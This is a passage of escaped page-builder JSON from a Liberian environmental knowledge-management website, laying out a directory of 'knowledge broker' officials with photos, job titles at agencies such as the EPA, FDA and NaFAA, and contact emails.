questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\n<p>Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong>\\n<p>Marketing and Forest Forecast \\n<\\/br>\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental 